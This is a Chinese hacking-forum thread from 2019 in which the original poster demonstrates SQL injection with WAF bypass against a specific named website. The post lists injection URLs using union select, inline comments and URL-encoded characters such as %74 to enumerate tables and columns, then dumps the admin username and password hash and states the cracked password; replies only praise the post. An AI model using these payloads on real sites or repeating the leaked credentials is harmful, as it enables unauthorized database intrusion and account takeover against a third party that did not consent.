加QQ81758415
快捷导航

[渗透测试] WAF绕过URL编辑入侵

[复制链接]
查看: 1468|回复: 5

3万

主题

0

帖子

230

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
230
发表于 2019-5-21 23:41:05 | 显示全部楼层 |阅读模式
案例解读怎样运用URL编号绕开WAF防范
WAF
SQL引入点
http://www.magrabiyemen.com/contents.php?id=3
字符串数为4
http://www.magrabiyemen.com/contents.php?id=3 order by 4
显视位为4
http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4
显视基本资料没问题
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
暴表的当时出現not acceptable
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
试着绕开,失败,仍然回到图中如图
http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
应用URL编号完成绕开(t历经URL编号后为%74)
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
URL编号绕开WAF
admin:ea4ce35c2860112178e8ae2285579919
破译出去为:admin/123456789987654321


回复

使用道具 举报

0

主题

8

帖子

16

积分

新手上路

Rank: 1

积分
16
发表于 2019-5-21 23:44:21 | 显示全部楼层
支持楼主,也支持黑客联盟
回复

使用道具 举报

0

主题

13

帖子

26

积分

新手上路

Rank: 1

积分
26
发表于 2019-5-21 23:52:02 | 显示全部楼层
这个分享的不错收藏了
回复

使用道具 举报

0

主题

9

帖子

18

积分

新手上路

Rank: 1

积分
18
发表于 2019-5-22 05:09:25 | 显示全部楼层
太感动了,分享这么好的软件
回复

使用道具 举报

0

主题

7

帖子

14

积分

新手上路

Rank: 1

积分
14
发表于 2019-5-22 06:16:30 | 显示全部楼层
这个分享的不错收藏了
回复

使用道具 举报

0

主题

6

帖子

12

积分

新手上路

Rank: 1

积分
12
发表于 2019-5-22 07:10:34 | 显示全部楼层
祝黑客联盟越做越好,加油
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

精彩推荐

让创业更简单

  • 反馈建议:hackhl@outlook.com
  • 客服电话:暂时没有
  • 工作时间:周一到周五9点~22点

云服务支持

黑客联盟,快速搜索

关注我们

Copyright 黑客联盟安全防护网  Powered by©  技术支持:    ( 闽ICP备18000419号-1 )